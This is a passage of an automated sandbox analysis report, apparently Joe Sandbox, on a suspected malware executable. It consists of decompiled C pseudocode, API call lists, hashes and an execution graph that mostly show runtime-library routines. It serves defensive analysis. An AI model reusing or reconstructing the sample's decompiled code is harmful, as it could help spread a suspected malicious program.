                                                                                                                                                                                                                                                    					_t61 = E010E127A(_v8, _v16, 2);
                                                                                                                                                                                                                                                    					if(_t61 != 0) {
                                                                                                                                                                                                                                                    						E010E10F4(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                                    						if(_a4 != 1) {
                                                                                                                                                                                                                                                    							_v12 = 0;
                                                                                                                                                                                                                                                    							_push( &_v12);
                                                                                                                                                                                                                                                    							_t49 = E010E1CBE(_t48, 0, _t61, _t61);
                                                                                                                                                                                                                                                    							if(_t49 == 0) {
                                                                                                                                                                                                                                                    								_t56 = _v12;
                                                                                                                                                                                                                                                    								_t53 = 0;
                                                                                                                                                                                                                                                    								_t35 = _t56;
                                                                                                                                                                                                                                                    								if( *_t56 == 0) {
                                                                                                                                                                                                                                                    									L15:
                                                                                                                                                                                                                                                    									_t36 = 0;
                                                                                                                                                                                                                                                    									 *0x116e814 = _t53;
                                                                                                                                                                                                                                                    									_v12 = 0;
                                                                                                                                                                                                                                                    									_t49 = 0;
                                                                                                                                                                                                                                                    									 *0x116e81c = _t56;
                                                                                                                                                                                                                                                    									L16:
                                                                                                                                                                                                                                                    									E010DA6DA(_t36);
                                                                                                                                                                                                                                                    									_v12 = 0;
                                                                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                    									L14:
                                                                                                                                                                                                                                                    									_t35 = _t35 + 4;
                                                                                                                                                                                                                                                    									_t53 =  &(_t53->i);
                                                                                                                                                                                                                                                    								} while ( *_t35 != 0);
                                                                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t36 = _v12;
                                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *0x116e814 = _v8 - 1;
                                                                                                                                                                                                                                                    						_t42 = _t61;
                                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                                    						 *0x116e81c = _t42;
                                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t43 = E010D9826();
                                                                                                                                                                                                                                                    						_push(0xc);
                                                                                                                                                                                                                                                    						_pop(0);
                                                                                                                                                                                                                                                    						 *_t43 = 0;
                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                    						_t49 = 0;
                                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                                    						E010DA6DA(_t61);
                                                                                                                                                                                                                                                    						return _t49;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t44 = E010D9826();
                                                                                                                                                                                                                                                    					_t62 = 0x16;
                                                                                                                                                                                                                                                    					 *_t44 = _t62;
                                                                                                                                                                                                                                                    					E010D976A();
                                                                                                                                                                                                                                                    					return _t62;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                    0x010e0fe2
                                                                                                                                                                                                                                                    0x010e1010
                                                                                                                                                                                                                                                    0x010e1016
                                                                                                                                                                                                                                                    0x010e101c
                                                                                                                                                                                                                                                    0x010e1024
                                                                                                                                                                                                                                                    0x010e102b
                                                                                                                                                                                                                                                    0x010e102b
                                                                                                                                                                                                                                                    0x010e1030
                                                                                                                                                                                                                                                    0x010e1037
                                                                                                                                                                                                                                                    0x010e103e
                                                                                                                                                                                                                                                    0x010e1050
                                                                                                                                                                                                                                                    0x010e1057
                                                                                                                                                                                                                                                    0x010e1076
                                                                                                                                                                                                                                                    0x010e1082
                                                                                                                                                                                                                                                    0x010e109d
                                                                                                                                                                                                                                                    0x010e10a0
                                                                                                                                                                                                                                                    0x010e10a7
                                                                                                                                                                                                                                                    0x010e10ad
                                                                                                                                                                                                                                                    0x010e10b4
                                                                                                                                                                                                                                                    0x010e10b7
                                                                                                                                                                                                                                                    0x010e10b9
                                                                                                                                                                                                                                                    0x010e10bd
                                                                                                                                                                                                                                                    0x010e10c7
                                                                                                                                                                                                                                                    0x010e10c7
                                                                                                                                                                                                                                                    0x010e10c9
                                                                                                                                                                                                                                                    0x010e10cf
                                                                                                                                                                                                                                                    0x010e10d2
                                                                                                                                                                                                                                                    0x010e10d4
                                                                                                                                                                                                                                                    0x010e10da
                                                                                                                                                                                                                                                    0x010e10db
                                                                                                                                                                                                                                                    0x010e10e1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e10bf
                                                                                                                                                                                                                                                    0x010e10bf
                                                                                                                                                                                                                                                    0x010e10bf
                                                                                                                                                                                                                                                    0x010e10c2
                                                                                                                                                                                                                                                    0x010e10c3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e10bf
                                                                                                                                                                                                                                                    0x010e10af
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e10af
                                                                                                                                                                                                                                                    0x010e1088
                                                                                                                                                                                                                                                    0x010e108d
                                                                                                                                                                                                                                                    0x010e108f
                                                                                                                                                                                                                                                    0x010e1091
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e1059
                                                                                                                                                                                                                                                    0x010e1059
                                                                                                                                                                                                                                                    0x010e105e
                                                                                                                                                                                                                                                    0x010e1060
                                                                                                                                                                                                                                                    0x010e1061
                                                                                                                                                                                                                                                    0x010e1096
                                                                                                                                                                                                                                                    0x010e1096
                                                                                                                                                                                                                                                    0x010e10e4
                                                                                                                                                                                                                                                    0x010e10e5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e10ee
                                                                                                                                                                                                                                                    0x010e0fea
                                                                                                                                                                                                                                                    0x010e0fea
                                                                                                                                                                                                                                                    0x010e0ff1
                                                                                                                                                                                                                                                    0x010e0ff2
                                                                                                                                                                                                                                                    0x010e0ff4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e0ff9

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CX17SY6xF6.exe,00000104), ref: 010E1010
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E10DB
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E10E5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                    • API String ID: 2506810119-3461935308
                                                                                                                                                                                                                                                    • Opcode ID: 373d93f74e44102330450a2909100e17625140d4ed6cdcdc234bc250aced3d9e
                                                                                                                                                                                                                                                    • Instruction ID: a6d78c63c88059550a0b36f5d1c2450b24bad03245d29f7a3ed88a7fa134dfac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 373d93f74e44102330450a2909100e17625140d4ed6cdcdc234bc250aced3d9e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB31CD71B00249EFDB35DF9AD888DDEBFFCEB88750B0081A6F94497201D6B18A41CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E010DA7B0(signed int _a4) {
                                                                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                                                                    				WCHAR* _t22;
                                                                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t9 = _a4;
                                                                                                                                                                                                                                                    				_t25 = 0x116df50 + _t9 * 4;
                                                                                                                                                                                                                                                    				_t24 =  *_t25;
                                                                                                                                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                                                                                                                                    					_t22 =  *(0x1126c50 + _t9 * 4);
                                                                                                                                                                                                                                                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						 *_t25 = _t27;
                                                                                                                                                                                                                                                    						if( *_t25 != 0) {
                                                                                                                                                                                                                                                    							FreeLibrary(_t27);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t13 = _t27;
                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                    						return _t13;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t15 = GetLastError();
                                                                                                                                                                                                                                                    					if(_t15 != 0x57) {
                                                                                                                                                                                                                                                    						_t27 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                                                                                                                                    						_t27 = _t15;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t4 = _t24 + 1; // 0x2e3e64cb
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				return  ~_t4 & _t24;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x010da7b5
                                                                                                                                                                                                                                                    0x010da7b9
                                                                                                                                                                                                                                                    0x010da7c0
                                                                                                                                                                                                                                                    0x010da7c4
                                                                                                                                                                                                                                                    0x010da7d2
                                                                                                                                                                                                                                                    0x010da7e8
                                                                                                                                                                                                                                                    0x010da7ec
                                                                                                                                                                                                                                                    0x010da815
                                                                                                                                                                                                                                                    0x010da817
                                                                                                                                                                                                                                                    0x010da81b
                                                                                                                                                                                                                                                    0x010da81e
                                                                                                                                                                                                                                                    0x010da81e
                                                                                                                                                                                                                                                    0x010da824
                                                                                                                                                                                                                                                    0x010da826
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da827
                                                                                                                                                                                                                                                    0x010da7ee
                                                                                                                                                                                                                                                    0x010da7f7
                                                                                                                                                                                                                                                    0x010da806
                                                                                                                                                                                                                                                    0x010da7f9
                                                                                                                                                                                                                                                    0x010da7fc
                                                                                                                                                                                                                                                    0x010da802
                                                                                                                                                                                                                                                    0x010da802
                                                                                                                                                                                                                                                    0x010da80a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da80c
                                                                                                                                                                                                                                                    0x010da80f
                                                                                                                                                                                                                                                    0x010da811
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010da811
                                                                                                                                                                                                                                                    0x010da80a
                                                                                                                                                                                                                                                    0x010da7c6
                                                                                                                                                                                                                                                    0x010da7cb
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,010DA757,?,00000000,00000000,00000000,?,010DA954,00000006,FlsSetValue), ref: 010DA7E2
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,010DA757,?,00000000,00000000,00000000,?,010DA954,00000006,FlsSetValue,011271D0,FlsSetValue,00000000,00000364,?,010D9D02), ref: 010DA7EE
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,010DA757,?,00000000,00000000,00000000,?,010DA954,00000006,FlsSetValue,011271D0,FlsSetValue,00000000), ref: 010DA7FC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                    • Opcode ID: bcc36aa359abf7adba57ff24006d8bc01ed8ff7c6574d863d0a34e63c15c9a55
                                                                                                                                                                                                                                                    • Instruction ID: f0535156bc981c67d49fcf991f8b47eb693ed832c9641c8e1fa7b2d1aa784391
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcc36aa359abf7adba57ff24006d8bc01ed8ff7c6574d863d0a34e63c15c9a55
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF01F732711322EFCB314A6DAC45AAA3BD8EF05AB57500530FE9AD7241D725D402C7E0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 010DF89A
                                                                                                                                                                                                                                                      • Part of subcall function 010DFEDF: ___AdjustPointer.LIBCMT ref: 010DFF29
                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 010DF8B1
                                                                                                                                                                                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 010DF8C3
                                                                                                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 010DF8E7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2633735394-0
                                                                                                                                                                                                                                                    • Opcode ID: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                    • Instruction ID: 51fbfa7f4717fa257895347a33a5012f133d93dc8d29a44521606e9fc110bb79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB01133200020ABBDF129F55CC05EDA7BAAEF59754F158425FE9966120C372E8A2DBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DF376() {
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				E010E07C7();
                                                                                                                                                                                                                                                    				E010E075B();
                                                                                                                                                                                                                                                    				if(E010E049E() != 0) {
                                                                                                                                                                                                                                                    					_t4 = E010DF4B6(_t8, __eflags);
                                                                                                                                                                                                                                                    					__eflags = _t4;
                                                                                                                                                                                                                                                    					if(_t4 != 0) {
                                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						E010E04DA();
                                                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                    0x010df376
                                                                                                                                                                                                                                                    0x010df37b
                                                                                                                                                                                                                                                    0x010df387
                                                                                                                                                                                                                                                    0x010df38c
                                                                                                                                                                                                                                                    0x010df391
                                                                                                                                                                                                                                                    0x010df393
                                                                                                                                                                                                                                                    0x010df39e
                                                                                                                                                                                                                                                    0x010df395
                                                                                                                                                                                                                                                    0x010df395
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010df395
                                                                                                                                                                                                                                                    0x010df389
                                                                                                                                                                                                                                                    0x010df389
                                                                                                                                                                                                                                                    0x010df38b
                                                                                                                                                                                                                                                    0x010df38b

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 010DF376
                                                                                                                                                                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 010DF37B
                                                                                                                                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 010DF380
                                                                                                                                                                                                                                                      • Part of subcall function 010E049E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 010E04AF
                                                                                                                                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 010DF395
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1761009282-0
                                                                                                                                                                                                                                                    • Opcode ID: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                    • Instruction ID: 2ddbdb3c3d694720e4c8d35b42350db38a346791d856a1c3d6d5bb737a96ed47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFC04C95641343981DA13ABB26181EE17C01CB69C4B82D4C1B8C25744F5DD9000B5972
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:4.7%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:1273
                                                                                                                                                                                                                                                    Total number of Limit Nodes:46
                                                                                                                                                                                                                                                    execution_graph 9046 ef9def 9047 ef9dfb ___FrameUnwindToState 9046->9047 9048 ef9e32 ___FrameUnwindToState 9047->9048 9054 efaf81 EnterCriticalSection 9047->9054 9050 ef9e0f 9051 efaef0 __fassign 20 API calls 9050->9051 9052 ef9e1f 9051->9052 9055 ef9e38 9052->9055 9054->9050 9058 efafc9 LeaveCriticalSection 9055->9058 9057 ef9e3f 9057->9048 9058->9057 8001 efdaed 8002 efdaf9 ___FrameUnwindToState 8001->8002 8026 efe373 8002->8026 8004 efdb00 8006 efdb29 8004->8006 8071 efdd8f IsProcessorFeaturePresent 8004->8071 8012 efdb68 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 8006->8012 8037 efd336 8006->8037 8010 efdb48 ___FrameUnwindToState 8016 efdbc8 8012->8016 8075 efc2fb 8012->8075 8013 efdbce 8049 ef1f80 8013->8049 8045 efdeaa 8016->8045 8027 efe37c 8026->8027 8082 efe0be IsProcessorFeaturePresent 8027->8082 8031 efe38d 8032 efe391 8031->8032 8093 f016b7 8031->8093 8032->8004 8035 efe3a8 8035->8004 8038 efd34d 8037->8038 8039 efdc5f _ValidateLocalCookies 5 API calls 8038->8039 8040 efd377 8039->8040 8040->8010 8041 efd2da 8040->8041 8042 efd309 8041->8042 8043 efdc5f _ValidateLocalCookies 5 API calls 8042->8043 8044 efd332 8043->8044 8044->8012 8364 eff070 8045->8364 8048 efded0 8048->8013 8050 ef1fda 8049->8050 8051 ef2202 8049->8051 8054 ef1feb 8050->8054 8055 ef2117 8050->8055 8052 ef2428 CloseHandle GetCurrentProcessId 8051->8052 8053 ef2213 8051->8053 8408 f05ff0 8052->8408 8380 f055c0 8053->8380 8390 ef3690 8054->8390 8055->8051 8061 ef2165 GetModuleHandleA 8055->8061 8059 ef227e 8384 f07440 8059->8384 8060 ef207d 8366 ef3e70 8060->8366 8402 f08570 8061->8402 8062 ef24ab MultiByteToWideChar 8066 ef2575 ExitProcess 8062->8066 8068 ef20e9 8068->8051 8069 ef23fe 8069->8066 8070 ef23c9 DdeInitializeA 8070->8069 8072 efdda5 ___scrt_fastfail 8071->8072 8073 efde4d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8072->8073 8074 efde97 8073->8074 8074->8004 8076 efc323 try_get_function 8075->8076 8077 efd762 _abort 8075->8077 8076->8016 8473 ef9c30 GetLastError 8077->8473 8081 efd773 8493 efa63a 8081->8493 8083 efe0e4 8082->8083 8084 eff376 8083->8084 8085 eff37b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 8084->8085 8104 f0049e 8085->8104 8088 eff389 8088->8031 8090 eff391 8091 eff39c 8090->8091 8118 f004da 8090->8118 8091->8031 8159 f021e0 8093->8159 8096 eff39f 8097 eff3a8 8096->8097 8103 eff3b9 8096->8103 8098 eff4e9 ___vcrt_uninitialize_ptd 6 API calls 8097->8098 8099 eff3ad 8098->8099 8100 f004da ___vcrt_uninitialize_locks DeleteCriticalSection 8099->8100 8101 eff3b2 8100->8101 8360 f00795 8101->8360 8103->8032 8107 f004a7 8104->8107 8106 f004d0 8109 f004da ___vcrt_uninitialize_locks DeleteCriticalSection 8106->8109 8107->8106 8108 eff385 8107->8108 8122 f00715 8107->8122 8108->8088 8110 eff4b6 8108->8110 8109->8108 8140 f0062a 8110->8140 8112 eff4c0 8113 eff4cb 8112->8113 8145 f006d8 8112->8145 8113->8090 8115 eff4d9 8116 eff4e6 8115->8116 8150 eff4e9 8115->8150 8116->8090 8119 f00504 8118->8119 8120 f004e5 8118->8120 8119->8088 8121 f004ef DeleteCriticalSection 8120->8121 8121->8119 8121->8121 8127 f00509 8122->8127 8124 f0072f 8125 f0074c InitializeCriticalSectionAndSpinCount 8124->8125 8126 f00738 8124->8126 8125->8126 8126->8107 8130 f00539 8127->8130 8132 f0053d try_get_function 8127->8132 8128 f0055d 8131 f00569 GetProcAddress 8128->8131 8128->8132 8130->8128 8130->8132 8133 f005a9 8130->8133 8131->8132 8132->8124 8134 f005d1 LoadLibraryExW 8133->8134 8138 f005c6 8133->8138 8135 f00605 8134->8135 8136 f005ed GetLastError 8134->8136 8135->8138 8139 f0061c FreeLibrary 8135->8139 8136->8135 8137 f005f8 LoadLibraryExW 8136->8137 8137->8135 8138->8130 8139->8138 8141 f00509 try_get_function 5 API calls 8140->8141 8142 f00644 8141->8142 8143 f0065c TlsAlloc 8142->8143 8144 f0064d 8142->8144 8144->8112 8146 f00509 try_get_function 5 API calls 8145->8146 8147 f006f2 8146->8147 8148 f0070c TlsSetValue 8147->8148 8149 f00701 8147->8149 8148->8149 8149->8115 8151 eff4f3 8150->8151 8152 eff4f9 8150->8152 8154 f00664 8151->8154 8152->8113 8155 f00509 try_get_function 5 API calls 8154->8155 8156 f0067e 8155->8156 8157 f00695 TlsFree 8156->8157 8158 f0068a 8156->8158 8157->8158 8158->8152 8160 f021fd 8159->8160 8163 f021f9 8159->8163 8160->8163 8165 f0215e 8160->8165 8162 efe39a 8162->8035 8162->8096 8177 efdc5f 8163->8177 8166 f0216a ___FrameUnwindToState 8165->8166 8184 efaf81 EnterCriticalSection 8166->8184 8168 f02171 8185 f01e18 8168->8185 8170 f02180 8171 f0218f 8170->8171 8198 f01ff2 GetStartupInfoW 8170->8198 8209 f021ab 8171->8209 8174 f021a0 ___FrameUnwindToState 8174->8160 8178 efdc6a IsProcessorFeaturePresent 8177->8178 8179 efdc68 8177->8179 8181 efdfd7 8178->8181 8179->8162 8359 efdf9b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8181->8359 8183 efe0ba 8183->8162 8184->8168 8186 f01e24 ___FrameUnwindToState 8185->8186 8187 f01e31 8186->8187 8188 f01e48 8186->8188 8220 ef9826 8187->8220 8212 efaf81 EnterCriticalSection 8188->8212 8193 f01e80 8226 f01ea7 8193->8226 8194 f01e40 ___FrameUnwindToState 8194->8170 8195 f01e54 8195->8193 8213 f01d69 8195->8213 8199 f020a1 8198->8199 8200 f0200f 8198->8200 8204 f020a8 8199->8204 8200->8199 8201 f01e18 27 API calls 8200->8201 8202 f02038 8201->8202 8202->8199 8203 f02066 GetFileType 8202->8203 8203->8202 8206 f020af 8204->8206 8205 f020f2 GetStdHandle 8205->8206 8206->8205 8207 f0215a 8206->8207 8208 f02105 GetFileType 8206->8208 8207->8171 8208->8206 8358 efafc9 LeaveCriticalSection 8209->8358 8211 f021b2 8211->8174 8212->8195 8229 efa67d 8213->8229 8215 f01d7b 8219 f01d88 8215->8219 8236 efa986 8215->8236 8217 f01dda 8217->8195 8243 efa6da 8219->8243 8278 ef9cb4 GetLastError 8220->8278 8223 ef976a 8336 ef96ef 8223->8336 8225 ef9776 8225->8194 8357 efafc9 LeaveCriticalSection 8226->8357 8228 f01eae 8228->8194 8234 efa68a __dosmaperr 8229->8234 8230 efa6ca 8232 ef9826 _free 19 API calls 8230->8232 8231 efa6b5 RtlAllocateHeap 8233 efa6c8 8231->8233 8231->8234 8232->8233 8233->8215 8234->8230 8234->8231 8249 efc6ac 8234->8249 8264 efa714 8236->8264 8239 efa9cb InitializeCriticalSectionAndSpinCount 8240 efa9b6 8239->8240 8241 efdc5f _ValidateLocalCookies 5 API calls 8240->8241 8242 efa9e2 8241->8242 8242->8215 8244 